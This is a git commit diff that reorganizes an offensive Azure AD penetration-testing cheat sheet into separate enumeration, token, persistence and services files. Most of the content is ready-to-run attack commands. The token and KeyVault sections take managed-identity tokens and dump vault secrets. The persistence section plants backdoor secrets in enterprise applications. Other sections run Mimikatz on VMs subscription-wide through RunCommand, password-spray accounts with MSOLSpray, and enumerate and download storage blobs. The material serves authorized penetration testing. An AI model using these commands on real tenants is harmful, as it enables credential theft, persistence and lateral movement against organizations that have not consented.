Devices and Services

pull/2/head
Swissky 2023-11-26 20:40:13 +01:00
parent f7bd9bb527
commit d3b66447cd
6 changed files with 199 additions and 205 deletions

View File

@ -14,14 +14,6 @@
* [Stealing Tokens](#stealing-tokens) * [Stealing Tokens](#stealing-tokens)
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli) * [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
* [Azure Storage Blob](#azure-storage-blob)
* [Enumerate blobs](#enumerate-blobs)
* [SAS URL](#sas-url)
* [List and download blobs](#list-and-download-blobs)
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
* [KeyVault Secrets](#keyvault-secrets)
* [Pass The Certificate](#pass--the-certificate) * [Pass The Certificate](#pass--the-certificate)
* [Pass The PRT](#pass-the-prt) * [Pass The PRT](#pass-the-prt)
* [Intunes Administration](#intunes-administration) * [Intunes Administration](#intunes-administration)
@ -188,81 +180,6 @@
``` ```
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
## Enumeration
## Enumeration methodology
```powershell
# Check Azure Joined
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
# Enumerate resources
PS Az> Get-AzResource
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
# Get info on a role
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get info user
PS AzureAD> Get-AzureADUser -ObjectId <ID>
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
# List all groups
PS AzureAD> Get-AzureADGroup -All $true
# Get members of a group
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
# Get Azure AD information
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
# Check if there is a user logged-in to az cli
PS> az ad signed-in-user show
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Get all details about an application
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
# List all VM's the user has access to
PS Az> Get-AzVM
PS Az> Get-AzVM | fl
# Get all function apps
PS Az> Get-AzFunctionApp
# Get all webapps
PS Az> Get-AzWebApp
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
# List all storage accounts
PS Az> Get-AzStorageAccount
PS Az> Get-AzStorageAccount | fl
# List all keyvaults
PS Az> Get-AzKeyVault
```
## Token from Managed Identity ## Token from Managed Identity
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. > **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph
* Users can save tokens using `Save-AzContext` * Users can save tokens using `Save-AzContext`
## Add credentials to all Enterprise Applications
```powershell
# Add secrets
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
# Use secrets to authenticate as Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
```
## Spawn SSH for Azure Web App
```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
```
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
```powershell
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - testsecure.blob.core.windows.net
Found Storage Account - securetest.blob.core.windows.net
Found Storage Account - securedata.blob.core.windows.net
Found Storage Account - securefiles.blob.core.windows.net
```
### SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
### List and download blobs
```powershell
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
```
## Virtual Machine RunCommand
Requirements:
* `Microsoft.Compute/virtualMachines/runCommand/action`
```powershell
# Get Public IP of VM : query the network interface
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
# Execute Powershell script on the VM
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
# Connect via WinRM
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Tools> Enter-PSSession $sess
```
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
```powershell
# List available VMs
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
TESTRESOURCES Remote-Test
# Execute Powershell script on the VM
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
```
Against the whole subscription using MicroBurst.ps1
```powershell
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
## KeyVault Secrets
```powershell
# keyvault access token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
# connect
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
# query the vault and the secrets
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
```
## Pass The PRT ## Pass The PRT
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). > MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).

View File

@ -1,5 +1,19 @@
# Azure AD Tokens # Azure AD Tokens
## Connection
After a successfull authentication, you will get an access token.
* az cli
* Azure AD Powershell
* Az Powershell
* External HTTP API
* Internal HTTP API
```ps1
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```
## Access Token ## Access Token

View File

@ -9,10 +9,21 @@
## Users ## Users
* List users: `Get-AzureADUser -All $true` * List users: `Get-AzureADUser -All $true`
* Enumerate groups: `Get-AzureADGroup -All $true` * Enumerate groups
```ps1
# List groups
Get-AzureADGroup -All $true
# Get members of a group
Get-AzADGroup -DisplayName '<GROUP-NAME>'
Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
```
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember` * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName` * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
* Add user to a group * Add user to a group
```ps1 ```ps1
$groupid = "<group-id>" $groupid = "<group-id>"
$targetmember = "<user-id>" $targetmember = "<user-id>"
@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
``` ```
### Device State
```ps1
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
```
### Join Devices ### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)

View File

@ -20,16 +20,19 @@
* Federation with Azure AD or O365 * Federation with Azure AD or O365
```powershell ```powershell
Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
``` ```
* Get the Tenant ID * Get the Tenant ID
```powershell ```powershell
Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
``` ```
### Enumerate Email ### Enumerate Email
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Ve
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/) Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1 ```ps1
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
``` ```
@ -80,13 +84,33 @@ Subdomain Service
* Using Az Powershell module * Using Az Powershell module
```powershell ```powershell
# Enumerate resources
PS Az> Get-AzResource PS Az> Get-AzResource
PS Az> Get-AzVM | fl
# List all VM's the user has access to
PS Az> Get-AzVM
# Get all webapps
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
# Get all function apps
PS Az> Get-AzFunctionApp PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
# List all storage accounts
PS Az> Get-AzStorageAccount
# List all keyvaults
PS Az> Get-AzKeyVault PS Az> Get-AzKeyVault
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
``` ```
* Using az cli * Using az cli

View File

@ -0,0 +1,16 @@
# Azure Persistence
## Add secrets to application
* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
```powershell
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
```
* Use secrets to authenticate as Service Principal
```ps1
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
```

View File

@ -1,6 +1,52 @@
# Azure Services # Azure Services
## Azure Runbook ## Virtual Machine
### RunCommand
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
**Requirements**:
* `Microsoft.Compute/virtualMachines/runCommand/action`
* List available Virtual Machines
```powershell
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
TESTRESOURCES Remote-Test
```
* Get Public IP of VM by querying the network interface
```powershell
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
```
* Execute Powershell script on the VM, like `adduser`
```ps1
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
```
* Finally you should be able to connect via WinRM
```ps1
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
```
Against the whole subscription using `MicroBurst.ps1`
```powershell
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
## Runbook
Runbook must be **SAVED** and **PUBLISHED** before running it. Runbook must be **SAVED** and **PUBLISHED** before running it.
@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## Azure Service Principal ## Service Principal
* Generate a new service principal password/secret * Generate a new service principal password/secret
```ps1 ```ps1
@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## KeyVault
* Keyvault access token
```powershell
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
```
* Connect with the access token
```ps1
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS> $accid = '2e...bc'
PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken
```
* Query the vault and the secrets
```ps1
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName>
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText
```
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
```powershell
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - redacted.blob.core.windows.net
```
### List and download blobs
```powershell
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
```
### SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
## Azure Web App
### SSH Connection
```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
```
## Azure Devops ## Azure Devops
* Verify the validity of an Azure Personal Access Token (PAT) * Verify the validity of an Azure Personal Access Token (PAT)